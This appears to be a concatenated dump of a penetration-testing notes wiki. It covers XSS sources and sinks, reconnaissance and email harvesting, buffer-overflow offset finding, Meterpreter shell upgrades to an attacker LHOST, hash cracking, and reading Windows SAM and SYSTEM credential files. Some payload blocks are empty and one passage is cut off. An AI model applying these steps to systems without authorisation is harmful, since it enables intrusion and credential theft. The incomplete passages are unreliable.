11 | ``` 12 | 13 | However, the complete URL is included in DOM-objects. 14 | 15 | ``` 16 | document.URL 17 | # will generate this output: https://example.com/#this_is_not_sent_to_server 18 | ``` 19 | 20 | ### Source 21 | 22 | So in order to inject and execute a DOM-based XSS we need a injection-point \(called source\) and a point of execution \(called sink\). 23 | 24 | In the example above `document.URL` is our source. Example of other sources are: 25 | 26 | ``` 27 | document.URL 28 | document.documentURI 29 | document.URLUnencoded (IE 5.5 or later Only) 30 | document.baseURI 31 | location 32 | location.href 33 | location.search 34 | location.hash 35 | location.pathname 36 | 37 | window.name 38 | document.referrer 39 | ``` 40 | 41 | ### Sinks 42 | 43 | ``` 44 | eval 45 | setTimeout 46 | setInterval 47 | setImmediate 48 | execScript 49 | crypto.generateCRMFRequest 50 | ScriptElement.src 51 | ScriptElement.text 52 | ScriptElement.textContent 53 | ScriptElement.innerText 54 | anyTag.onEventName 55 | ``` 56 | 57 | 58 | 59 | ### Finding it 60 | 61 | To find DOM-based XSS you will need to check out the code. 62 | 63 | 64 | 65 | If the javascript code is bundled and minified you can use js\_beautify to make it readble again. 66 | 67 | 68 | 69 | ``` 70 | sudo apt-get install libjavascript-beautifier-perl 71 | # then invoke js_beautify 72 | ``` 73 | 74 | 75 | 76 | 77 | 78 | ## References 79 | 80 | [https://github.com/wisec/domxsswiki/wiki/location,-documentURI-and-URL-sources](https://github.com/wisec/domxsswiki/wiki/location,-documentURI-and-URL-sources) 81 | 82 | -------------------------------------------------------------------------------- /editing-exploits.md: -------------------------------------------------------------------------------- 1 | # Editing exploits 2 | 3 | We often find exploits that do not work out of the box. Typical problems we encounter are: 4 | - Payload needs to be changed 5 | - Return-address is incorrect 6 | 7 | -------------------------------------------------------------------------------- /email_harvesting.md: -------------------------------------------------------------------------------- 1 | # Identifying People 2 | 3 | We want to find out how is connected to the target. That can be site administrator, employees, owner, mods. Maybe one of the administrators have posted in a forum with their email, or in a newsgroup or somewhere else. Those posts could contain useful data about the stack or help us devlop a network diagram. We might also need to use social engineering. 4 | 5 | In order to find people we might use the following sources: 6 | 7 | * The company website 8 | * Social media \(LinkedIn, Facebook, Twitter etc\) 9 | * Forums and newsgroups 10 | * Metadata from documents 11 | 12 | ### Company Website 13 | 14 | This is pretty obvious. Just look around on the website. Or download it. Or spider it with burp and then search the result. 15 | 16 | Make sure to check out the blog. There you might have employees writing blogposts under their name. 17 | 18 | ### Social Media 19 | 20 | ``` 21 | site:twitter.com companyname 22 | site:linkedin.com companyname 23 | site:facebook.com companyname 24 | ``` 25 | 26 | ### Metadata From Documents 27 | 28 | You find some documents and then run exiftool on them to see if there is any interesting metadata. 29 | 30 | ``` 31 | site:example.com filetype:pdf 32 | ``` 33 | 34 | ## Email Harvesting 35 | 36 | theharvester - I have not had luck with this 37 | 38 | ``` 39 | theharvester -d example.com -l 500 -b all 40 | ``` 41 | 42 | ## Check if emails have been pwned before 43 | 44 | [https://haveibeenpwned.com](https://haveibeenpwned.com) 45 | 46 | # Users 47 | 48 | social-searcher.com 49 | 50 | Reddit 51 | Snoopsnoo 52 | 53 | -------------------------------------------------------------------------------- /escaping_restricted_shell.md: -------------------------------------------------------------------------------- 1 | # Escaping Restricted Shell 2 | 3 | Some sysadmins don't want their users to have access to all commands. So they get a restriced shell. If the hacker get access to a user with a restriced shell we need to be able to break out of that, escape it, in order to have more power. 4 | 5 | Many linux distros include rshell, which is a restriced shell. 6 | 7 | To access the restried shell you can do this: 8 | 9 | ``` 10 | sh -r 11 | rsh 12 | 13 | rbash 14 | bash -r 15 | bash --restricted 16 | 17 | rksh 18 | ksh -r 19 | ``` 20 | 21 | http://securebean.blogspot.cl/2014/05/escaping-restricted-shell_3.html?view=sidebar 22 | http://pen-testing.sans.org/blog/pen-testing/2012/06/06/escaping-restricted-linux-shells -------------------------------------------------------------------------------- /example_of_company_architecture.md: -------------------------------------------------------------------------------- 1 | # Example of company architecture 2 | 3 | https://www.reddit.com/r/AskNetsec/comments/4p7onl/gaining_initial_access_in_realworld_pentesting/ 4 | 5 | ![Map](dGaQO6Y.png) -------------------------------------------------------------------------------- /examplesXSS.md: -------------------------------------------------------------------------------- 1 | # Examples 2 | 3 | This is a good list: 4 | 5 | https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester 6 | 7 | ## No security 8 | `` 9 | 10 | 11 | Imagine that the server sanitizes `` 13 | `` 14 | 15 | ### Using the IMG-tag 16 | ``` 17 | 18 | 19 | 20 | 21 | 22 | ``` 23 | 24 | 25 | ### Onmouseover 26 | ``` 27 | d 28 | ``` 29 | -------------------------------------------------------------------------------- /exploit-examples_2.md: -------------------------------------------------------------------------------- 1 | # Exploit-examples 2 2 | 3 | 4 | So whole sections continues to be a chaos. So instead of repairing the broken chapters I am just going to start writing a new, and see if I can have it make more sense this time. 5 | 6 | You have an application that you know is vulnerable to a buffer overflow. These are the steps to exploit it: 7 | 8 | - Find the buffer overflow 9 | - Find exact offset 10 | - Identify bad characters 11 | 12 | 13 | ## Find the buffer overflow 14 | 15 | First we need to find where it is. We can do that by progressivly add more bytes and then attach the process to a debugger (immunity, olly). Then we just probe the application with more and more bytes until we reach the limit where the application crashes. 16 | 17 | ## Find exact offset 18 | 19 | Now we need to know exactly where the offset is. We can do that using some metasploit tools. We create a fuzzing payload lke this 20 | 21 | 22 | ``` 23 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 700 24 | ``` 25 | 26 | This will return something like this: 27 | 28 | ``` 29 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A... 30 | ``` 31 | 32 | So we modify our exploit-script and add the fuzzer-payload as our payload. We run it again and look for where it crashes in out debugger. 33 | 34 | We take that hex and check with another metasploit tool to know the exact offset. Like this 35 | 36 | ``` 37 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438 -l 700 38 | # Stdout 39 | [*] Exact match at offset 605 40 | ``` 41 | 42 | So now we know the exact offset. This means that we know where we have the EIP. We can now modify our exploit-script to place a uniq string in the EIP to make sure everything is working as expected. 43 | 44 | ## Identify bad characters 45 | 46 | Now it is time to start developing our malicious payload. But before we do that we need to know what bad characters we have, so we can avoid them. We can do that by sending all characters to the buffer and see how the application reacts to it. 47 | 48 | Here are all characters, from **x01** to **xff**. If the application removes it or something like that we know it is a bad character. 49 | 50 | ``` 51 | \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1 \xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4 \xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7 \xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff 52 | ``` 53 | 54 | Common bad characters are 55 | **x00** - Null byte 56 | **x0a** - New line 57 | **x0d** - Carriege return 58 | 59 | 4. -------------------------------------------------------------------------------- /exploiting.md: -------------------------------------------------------------------------------- 1 | # Exploiting 2 | 3 | So you have done your homework, and done your vulnerability analysis and found several vulnerabilities. Now it is time to exploit them. 4 | 5 | Before you start writing your own exploits you should of course check if there are some already written. 6 | 7 | Do not just grab any exploit on the internetz. If it contains shellcode it might be you that is getting hacked. On Exploit-db and Security focus they vet the exploits before they are published so it is at least a bit more secure. But be paranoid, and don't trust shellcode or code that you didn't write. 8 | 9 | [Exploit-DB](https://www.exploit-db.com) 10 | [Security Focus](http://www.securityfocus.com/) 11 | -------------------------------------------------------------------------------- /exploits.md: -------------------------------------------------------------------------------- 1 | # Exploits 2 | 3 | Once you have chosen an exploit you can make sure that the exploit is targeting by writing 4 | 5 | ``` 6 | show targets 7 | ``` 8 | 9 | Show compatible payloads 10 | ``` 11 | show payloads 12 | ``` 13 | 14 | ``` 15 | show options 16 | ``` 17 | 18 | ``` 19 | show advanced 20 | ``` 21 | 22 | 23 | ``` 24 | show evasion 25 | ``` 26 | 27 | -------------------------------------------------------------------------------- /exposed_version_control.md: -------------------------------------------------------------------------------- 1 | # Exposed Version Control 2 | 3 | If you, using dirb or nikto, find version control file exposed, you can use it like this. 4 | 5 | ``` 6 | git clone http://example.com/.git 7 | ``` 8 | 9 | https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/ 10 | -------------------------------------------------------------------------------- /failure-to-restrict-url-access.md: -------------------------------------------------------------------------------- 1 | ## Failure to Restrict URL Access 2 | 3 | 4 | 5 | This basically means that a normal user has access to areas on a webpage that should only be accessible to an administrator, or another user. This can happen when the website hides functionality from its users, instead of restricting it with authentication. So if the user finds out the hidden URL the user will be able to access that part of the website. 6 | 7 | 8 | 9 | ### 10 | 11 | ### How to exploit it 12 | 13 | It kind of depends on what access you have to the service. If you have access to an installation you can just create a list of all URLs that the admin-account, or low-privilege accounts have access too. And then check if a non-authenticated users can access those pages. 14 | 15 | If you are testing it black-box style you can force browse it. 16 | 17 | 18 | 19 | ### References 20 | 21 | 22 | 23 | https://www.owasp.org/index.php/Top\_10\_2010-A8-Failure\_to\_Restrict\_URL\_Access 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /find_subdomains.md: -------------------------------------------------------------------------------- 1 | # Find Subdomains 2 | 3 | 4 | Finding subdomains is fundamental. The more subdomains you find, the bigger attack surface you have. Which means bigger possibility of success. 5 | 6 | For now this seems to be a very comprehensive list of tools to find subdomains. 7 | https://blog.bugcrowd.com/discovering-subdomains 8 | 9 | -------------------------------------------------------------------------------- /finding_subdomains.md: -------------------------------------------------------------------------------- 1 | # Find Subdomains 2 | 3 | 4 | Finding subdomains is fundamental. The more subdomains you find, the bigger attack surface you have. Which means bigger possibility of success. 5 | 6 | For now this seems to be a very comprehensive list of tools to find subdomains. 7 | https://blog.bugcrowd.com/discovering-subdomains 8 | 9 | Some tools find some stuff, other tools other stuff. So your best bet is to use a few of them together. Don't forget to brute-force recursively! 10 | 11 | 12 | ### recon-ng 13 | 14 | In order to find subdomains we can use the recon-ng framework. It has the same basic structure as metasploit. You can learn more about this tool in the tools-section. 15 | 16 | ```bash 17 | recon-ng 18 | 19 | use use recon/domains-hosts/ 20 | 21 | # This will give you a vast amount of alternatives. 22 | 23 | show options 24 | 25 | set source cnn.com 26 | ``` 27 | 28 | 29 | All these subdomains will be saved in `hosts`, which you can access though: `show hosts` 30 | 31 | If some of these subdomains are not given IPs automatically you can just run 32 | 33 | ``` 34 | use recon/hosts-hosts/resolve 35 | run 36 | ``` 37 | 38 | And it will resolve all the hosts in the hosts-file. 39 | 40 | 41 | ### Google Dorks 42 | 43 | Using google we can also find subdomains. 44 | 45 | This will only give us the subdomains of a site. 46 | 47 | `site:msn.com -site:www.msn.com` 48 | 49 | `site:*.nextcloud.com` 50 | 51 | To exclude a specific subdomain you can do this: 52 | 53 | `site:*.nextcloud.com -site:help.nextcloud.com` 54 | 55 | ### subbrute.py 56 | 57 | The basic command is like this 58 | 59 | `./subbrute.py -p cnn.com` 60 | 61 | https://github.com/TheRook/subbrute 62 | 63 | ### Knock 64 | 65 | I haven't tested this yet. 66 | https://github.com/guelfoweb/knock 67 | 68 | 69 | ### Being smart 70 | 71 | You also have to look at what kind of system the target has. Some web-apps give their clients their own subdomains. Like github. 72 | 73 | Check out the homepage 74 | Often companies brag about their clients. You can use this to guess the subdomains of some clients. 75 | 76 | 77 | ### Reverse DNS-lookup 78 | 79 | If you manage to figure out the IP range that the target owns (see section about nmap below). You can see which machines are online. And then you can run a script to find out the domain-addresses of those machines. That way you might find something new. 80 | 81 | The text-file onlyIps.txt is a textfile with one IP-address on each line. 82 | 83 | ``` 84 | #!/bin/bash 85 | 86 | while read p; do 87 | echo $p; 88 | host $p 89 | done > wordlist2.txt 24 | ``` 25 | 26 | ## Create a custom wordlist 27 | 28 | 29 | 30 | **Html2dic - Build dictionary from html** 31 | 32 | You can build a dictionary from a html-page. 33 | 34 | ``` 35 | curl http://example.com > example.txt 36 | ``` 37 | 38 | Then run: 39 | 40 | ``` 41 | html2dic example.txt 42 | ``` 43 | 44 | Then you should probably remove duplicates. 45 | 46 | 47 | **Cewl - Spider and build dictionary** 48 | 49 | ``` 50 | cewl -w createWordlist.txt https://www.example.com 51 | ``` 52 | 53 | Add minimum password length: 54 | 55 | ``` 56 | cewl -w createWordlist.txt -m 6 https://www.example.com 57 | ``` 58 | 59 | **Improve the custom wordlist** 60 | 61 | As we all know few password are just simple words. Many use numbers and special characters. To improve our password list we can use john the ripper. We can input our own rules, or we can just use the standard john-the-ripper rules 62 | 63 | ``` 64 | john ---wordlist=wordlist.txt --rules --stdout > wordlist-modified.txt 65 | ``` 66 | 67 | 68 | ## References 69 | 70 | http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-4-creating-custom-wordlist-with-crunch-0156817/ 71 | -------------------------------------------------------------------------------- /getting_meterpreter_shell.md: -------------------------------------------------------------------------------- 1 | # Meterpreter shell for post-exploitation 2 | 3 | By now you probably has some kind of shell to the target. If it is not a meterpreter shell you should probably try to turn the current shell into a meterpreter shell, since it gives you a lot of tools available really easy. 4 | 5 | So just create a meterpreter-shell from msfvenom or something like that. Maybe a php-shell. Or whatever you have access to. Then you just fire that script and get your meterpreter shell. Check out the chapter Exploiting/Msfvenom for more about creating payloads. 6 | 7 | 8 | ## Basics 9 | 10 | List all commands 11 | ``` 12 | help 13 | ``` 14 | 15 | Get help about a specific command 16 | ``` 17 | help upload 18 | ``` 19 | 20 | ### Sessions 21 | So first some basics. You can put the shell into a background job with the command `background`. This might be useful if you have several shells going at the same time. Or if you want to move to a specific directory to upload or download some files. 22 | 23 | List background sessions 24 | ``` 25 | background -l 26 | ``` 27 | 28 | Connect back to a background session 29 | ``` 30 | background -i 1 31 | ``` 32 | 33 | Upload and download files. 34 | ``` 35 | upload 36 | download 37 | ``` 38 | 39 | 40 | ## Scripts 41 | 42 | 43 | ### Migrate 44 | 45 | A really common and useful script that is build into metasploit is the migrate script. If you get the shell through some kind of exploits that crashes a program the user might shut down that program and it will close your session. So you need to migrate your session to another process. You can do that with the `migrate` script. 46 | 47 | First run this command to output all processes 48 | 49 | ``` 50 | ps 51 | ``` 52 | 53 | Now you choose one and run 54 | ``` 55 | run migrate -p 1327 56 | ``` 57 | Where the `-p` is the PID of the process. 58 | 59 | 60 | ## Post modules 61 | 62 | There are tons of modules specifically created for post-exploitation. They can be found with 63 | 64 | ``` 65 | use post/ 66 | ``` 67 | 68 | ### Upgrade a normal shell to metepreter 69 | 70 | There is a point in doing stuff through metasploit. For example, if you find a exploit that does not have meterpreter available as a payload you can just start a normal shell and then upgrade it. To do that you do the following: 71 | 72 | First you generate a shell through metasploit, either through a specici exploit or through a msfvenom-shell that you upload. Now that you have a normal shell it is time to upgrade it to a meterpreter shell. 73 | 74 | First we have to leave the shell but without killing it. So we do 75 | 76 | ``` 77 | Ctr-z 78 | Background session 2? [y/N] y 79 | ``` 80 | 81 | Now we have that shell running in the background, and you can see it with 82 | 83 | ``` 84 | show sessions 85 | #or 86 | sessions -l 87 | ``` 88 | 89 | And you can connect to it again with 90 | 91 | ``` 92 | sessions -i 1 93 | ``` 94 | 95 | Or whatever the number of the session is. 96 | 97 | So now we have the shell running in the background. It is time to upgrade 98 | 99 | ``` 100 | use post/multi/manage/shell_to_meterpreter 101 | set LHOST 192.168.1.102 102 | set session 1 103 | exploit 104 | ``` 105 | 106 | Now metasploit will create a new session with meterpeter that will be available to you. -------------------------------------------------------------------------------- /google_hacking.md: -------------------------------------------------------------------------------- 1 | # Search Engine Discovery 2 | 3 | Search engines can be very useful for finding information about the target. Search engines can be used for two things: 4 | 5 | * Finding sensitive information on the domain that you are attacking 6 | * Finding sensitive information about the company and its employees in on other parts of the internet. Like forums, newsgroups etc. 7 | 8 | 9 | 10 | Remember that the world is bigger than google. So test out the other search engines. 11 | 12 | Baidu, binsearch.info, Bing, DuckDuckGo, ixquick/Startpage, Shodan,PunkSpider 13 | 14 | 15 | 16 | Google is a good tool to learn more about a website. 17 | 18 | ## Finding specific filetypes 19 | 20 | ``` 21 | filetype:pdf 22 | ``` 23 | 24 | ### Search within webaddress 25 | 26 | ``` 27 | site:example.com myword 28 | ``` 29 | 30 | ### Find in url 31 | 32 | ``` 33 | inurl:test.com 34 | ``` 35 | 36 | ### Wild cards 37 | 38 | You can use the asterisk to as a wildcard: 39 | 40 | ``` 41 | * 42 | ``` 43 | 44 | Example: 45 | 46 | ``` 47 | "I've been * for a heart" 48 | ``` 49 | 50 | This will return answers where \* is anything. 51 | 52 | ## Exclude words 53 | 54 | ``` 55 | - 56 | ``` 57 | 58 | the dash excludes a specific word 59 | 60 | This query searches for pages that used the word bananasplit. 61 | 62 | ``` 63 | -banana bananasplit 64 | ``` 65 | 66 | ### Cached version 67 | 68 | So if a website has been taken down you can still find the cached version, of the last time google visited the site 69 | 70 | ``` 71 | cache:website.com 72 | ``` 73 | 74 | [https://www.blackhat.com/presentations/bh-europe-05/BH\_EU\_05-Long.pdf](https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf) 75 | 76 | ## Examples 77 | 78 | Find login-pages on sites that use the ending .bo. For bolivia. 79 | 80 | ``` 81 | site:bo inurl:admin.php 82 | ``` 83 | 84 | ## More 85 | 86 | Here are some more 87 | 88 | Great guide for google dorks 89 | [https://www.blackhat.com/presentations/bh-europe-05/BH\_EU\_05-Long.pdf](https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf) 90 | 91 | [http://www.googleguide.com/advanced\_operators\_reference.html](http://www.googleguide.com/advanced_operators_reference.html) 92 | 93 | [http://www.searchcommands.com/](http://www.searchcommands.com/) 94 | 95 | [https://support.google.com/websearch/answer/2466433?hl=en](https://support.google.com/websearch/answer/2466433?hl=en) 96 | 97 | [https://www.exploit-db.com/google-hacking-database/](https://www.exploit-db.com/google-hacking-database/) 98 | 99 | -------------------------------------------------------------------------------- /hashcat.md: -------------------------------------------------------------------------------- 1 | # Hashcat 2 | 3 | -------------------------------------------------------------------------------- /host-header-attack.md: -------------------------------------------------------------------------------- 1 | # Host Header Attack 2 | 3 | It is common for a web-server to host several applications. These applications are distinguished based on the domain-name. So how would a web server know which page the a user wants to visit? The answer is the host-header. In the host header the domain-name is specified. 4 | 5 | 6 | 7 | ### Password reset 8 | 9 | The host-header ca sometimes be parsed in the code and used for creating links. So if the host-header is used for creating the password reset link it is possible for an attacker to steal the reset-token. The attacker just needs to enter the victims email-address in the password reset field, then intercept the request and change the host-header to some address that the attacker controls. When the victim recieves the password reset link they will click on it, which will direct the link to the attackers site, which enables the attacker to steal the reset token, since it will be stored in the url that the user clicks. 10 | 11 | 12 | 13 | ## Web Cache Poisining 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /html-injection.md: -------------------------------------------------------------------------------- 1 | ## HTML-Injection 2 | 3 | This attack is really similar to to Cross-Site Scripting attacks. 4 | 5 | What we can do: 6 | 7 | * Create a fake login-page, that tricks the user to log in again, but the post-is sent to a server that the attacker controls. And can thereby steal the credentials of the user. 8 | * Inject javacript. 9 | 10 | ### Injecting Javascript 11 | 12 | Javascript can be injected into html-tags, which can be used to steal cookies and other things. 13 | 14 | ### Injecting HTML 15 | 16 | The attacker can inject html forms that tricks the user into giving up sensitive data. 17 | 18 | See eventhandlers for more ways: https://www.owasp.org/index.php/XSS\_Filter\_Evasion\_Cheat\_Sheet\#Event\_Handlers 19 | 20 | ``` 21 | 22 | 23 | ``` 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /identify_hash_and_crack_it.md: -------------------------------------------------------------------------------- 1 | # Offline password cracking 2 | 3 | We might find passwords or other credentials in databases. These are often hashed, so we need to first identify which hash it is and then try to crack it. The first step is to identify the hash-algorithm that was used to hash the password. 4 | 5 | ## Identify hash 6 | 7 | There are generally speaking three pieces of data we can use to identify a hash. 8 | - The length of the hash 9 | - The character set 10 | - Any special characters 11 | 12 | In order to identify a hash we can either use specialized tools that analyze the hash and then return a guess on which algorithm it is. An easier way is of course to just look in the documentation of the software where you found the hashes. It usually says in the documentation or the source code which type of hash is being used. 13 | 14 | 15 | In kali we can use `hash-identifier` or `hashid`: 16 | 17 | ``` 18 | hash-identifier 19 | hashid 20 | ``` 21 | 22 | Or try these online services: 23 | 24 | http://www.onlinehashcrack.com/hash-identification.php 25 | 26 | https://md5hashing.net/hash_type_checker 27 | 28 | 29 | ## Cracking the hash 30 | 31 | Okay so now we know what hash it is, let's get cracking. 32 | 33 | If you want to try out the functionality of hashcat or john the ripper you can find example hashes here: http://openwall.info/wiki/john/sample-hashes. 34 | 35 | ### Hashcat 36 | 37 | Look for the specific type of hash you want to crack in the list produced by the following command: 38 | 39 | ``` 40 | hashcat --help 41 | ``` 42 | 43 | My hash was a Apache md5, so I will use the corresponding code for it, `1600` 44 | 45 | `-a 0` - straight 46 | 47 | 48 | `-o found.txt` - where the cracked hash outputs 49 | 50 | `admin.hash" - the hash you want to crack. 51 | 52 | `/usr/share/hashcat/rules/rockyou-30000.rule` - the wordlist we use 53 | 54 | ``` 55 | hashcat -m 11 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule 56 | ``` 57 | 58 | ### John the ripper 59 | 60 | So this is how you usually crack passwords with john 61 | 62 | ``` 63 | john --wordlist=wordlist.txt dump.txt 64 | ``` 65 | 66 | If you do not find the password you can add the john-rules. Which add numbers and such things to each password. 67 | 68 | ``` 69 | john --rules --wordlist=wordlist.txt dump.txt 70 | ``` 71 | 72 | 73 | #### Linux shadow password 74 | 75 | First you need to combine the passwd file with the shadow file using the unshadow-program. 76 | 77 | ``` 78 | unshadow passwd-file.txt shadow-file.txt > unshadowed.txt 79 | john --rules --wordlist=wordlist.txt unshadowed.txt 80 | ``` 81 | 82 | ### Rainbow tables 83 | 84 | So basically a rainbow table is a precalculated list of passwords. So instead of having to hash the word you want to try you create a list of hashes. So you do not have to hash them before comparing. This might take a long time to do, hashing a whole wordlist, but when you do the comparison between the password and the test-word it will go a lot faster. 85 | 86 | 87 | ## Using Online Tools 88 | 89 | ### findmyhash 90 | 91 | You can use findmyhash 92 | 93 | Here is an example of how to use it: 94 | 95 | ``` 96 | findmyhash LM -h 6c3d4c343f999422aad3b435b51404ee:bcd477bfdb45435a34c6a38403ca4364 97 | ``` 98 | 99 | ### Cracking 100 | 101 | Crackstation 102 | https://crackstation.net/ 103 | 104 | Hashkiller 105 | https://hashkiller.co.uk/ 106 | 107 | Google hashes 108 | Search pastebin. 109 | 110 | ## Windows 111 | 112 | If you find a local file inclusion vulnerability you might be able to retrieve two fundamental files from it. the `system` registry and the `SAM` registry. There two files/registries are all we need to get the machines hashes. 113 | These files can be found in several different locations in windows. Here they are: 114 | 115 | ``` 116 | Systemroot can be windows 117 | %SYSTEMROOT%\repair\SAM 118 | windows\repair\SAM 119 | %SYSTEMROOT%\System32\config\RegBack\SAM 120 | 121 | System file can be found here 122 | SYSTEMROOT%\repair\system 123 | %SYSTEMROOT%\System32\config\RegBack\system 124 | ``` 125 | 126 | So if the manage to get your hands on both of these files you can extract the password hashed like this: 127 | 128 | ``` 129 | pwdump system sam 130 | ``` 131 | -------------------------------------------------------------------------------- /identifying-technology-stack.md: -------------------------------------------------------------------------------- 1 | ## Identifying Technology Stack 2 | 3 | 4 | 5 | * Job openings 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /immunity_debugger.md: -------------------------------------------------------------------------------- 1 | # Immunity Debugger 2 | 3 | Immunity debugger is a great GUI and CLI tool to use for exploit-development. -------------------------------------------------------------------------------- /insecure-direct-object-reference-idor.md: -------------------------------------------------------------------------------- 1 | ## Insecure Direct Object Reference 2 | 3 | The vulnerability arises when the user has direct access to objects from user-supplied data. 4 | 5 | The classic example of this would be something like the follwoing 6 | 7 | ``` 8 | http://foo.bar/changepassword?user=someuser 9 | ``` 10 | 11 | Imagine that you know anothers username , then you can just change the username and be able to change the password for that user. The data you can access can be anything, maybe private comments, messages, images, user data. 12 | 13 | 14 | 15 | ### How to discover 16 | 17 | If you have access to the source-code that is an easy way to do it. Check the sections where restricted data is presented. And see if there is any access-control in that code. 18 | 19 | 20 | 21 | ### Examples 22 | 23 | 24 | 25 | https://hackerone.com/reports/53858 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /java_applet.md: -------------------------------------------------------------------------------- 1 | # Java applet 2 | 3 | Okay this is pretty outdated. Chrome does not support java by default anymore. But other browsers do, and a lot of companies use java. 4 | 5 | This is an attack that is based on attacking the user and not necessarily the software. We want the user to execute malicious code on his/her computer. 6 | 7 | -------------------------------------------------------------------------------- /lead_to_compromise.md: -------------------------------------------------------------------------------- 1 | # Attacking the System 2 | 3 | I have divided the web-vulnerabilites into two categories: **Attacking the System** and **Attacking the User**. I know this might seem like a pretty weird categorization, but I think it make sense. So in this chapter we will look at vulnerabilities that primarily focus on the webserver, and not the visiting users. 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /linux.md: -------------------------------------------------------------------------------- 1 | # Linux 2 | 3 | Linux was first released in September 17, 1991 by Linus Torvalds. Strictly speaking Linux is just the kernel in the GNU/Linux operating system. Linux is the most installed OS in the world, that is mainly due to the fact that android use Linux as its OS. It is leading in pretty much all markets except for the desktop-market. 4 | 5 | From a infosec perspective there are two reasons we should learn Linux. The first is that the majority of all servers in the world is running on Linux. And if we want to hack those servers we of course have to understand how they work. The second reason is that the vast majority of all hacking-tools are only available on Linux. 6 | 7 | So in this chapter we are going to look at bit at some basic commands and basics of Linux. Of course your can write quite a few books about Linux, so this tiny little introduction is just way to get you started. And also, I am just a beginner myself so I am just writing stuff that I myself need to learn. 8 | 9 | Although there is only one Linux Kernel there are many Linux Distributions, that is: different versions. That is because the GNU/Linux OS is a mix of GNU software and the Linux Kernel. The GNU/Linux OS can be packaged in a million different ways, with different software preinstalled, with different configurations, with different Graphical User Interface \(GUI\). The fact that you can configure the OS however you like has given rise to the many different versions. These different versions are usually called **distros**. There are hundreds of different distros. Some common ones are: Ubuntu, Debian, Redhat, CentOS and Arch. 10 | 11 | So you probably wonder what the main differences are. Here is a list of some differences: 12 | 13 | * Package management program. 14 | * Speed and interval of release 15 | * Desktop environment 16 | * Default GUI 17 | * Community 18 | * Compilation of the Linux Kernel 19 | 20 | So as you can see depending on the users needs you can choose the distro that fits you best. Some people want to have bleeding-edge \(the latest updates - although a bit more unstable\) and others prefer stability. Some people want a distro with higher degree of security. Others want a distro with only free software, others want distros specially made for kids, or for education, or for scientists. One distro that is common among pentesters is Kali Linux. It comes preinstalled with hundreds of different pentesting-related tools. It might not be the best distro for everyday use. But for pentesting is is really convenient. Of course you could just download the programs to your non-kali distro as you go along. But it might be just an unneccesary hassle for you. 21 | 22 | -------------------------------------------------------------------------------- /littearature.md: -------------------------------------------------------------------------------- 1 | # Literature 2 | 3 | 4 | ## Zines 5 | 6 | 7 | **2600: The Hacker Quarterly** 8 | 9 | https://www.2600.com/ 10 | 11 | **Go null yourself** 12 | 13 | http://web.textfiles.com/ezines/GONULLYOURSELF/gonullyourself1.txt 14 | 15 | **Hacking with Kali** 16 | 17 | https://archive.org/stream/HackingWithKali/Hacking%20with%20Kali_djvu.txt 18 | 19 | 20 | ## Books 21 | 22 | **Hacking - The Art of Exploitation** 23 | 24 | **Pentesting - A Hands-On Introduction to Hacking by Georgia Weidman** -------------------------------------------------------------------------------- /loot.md: -------------------------------------------------------------------------------- 1 | # Loot and Enumerate 2 | 3 | After you have gained access to a machine you must loot it. This is useful in order to be able to pivot into other machine. 4 | 5 | If you are on a network with other machines that you still haven't owned, it might be useful to take a tcp-dump from the machine you have owned. So that you can inspect the traffic between that machine and the other machines on the network. This might be helpful when attacking the other machines. 6 | 7 | So after we have exploited a machine we want to use that machine to learn as much about the network as possible. To be able to map the entire network. We want to know about switches, firewalls, routers, other computers, server, etc. We want to know what ports are open, their operating systems. 8 | 9 | We can start getting an understanding of the network by taking a tcp-dump. 10 | 11 | We also want to look for password that might be reused on other machines, and sensitive information found in databases. Information about the user might be interesting in order to use social engineering attacks against other users in the network. 12 | 13 | 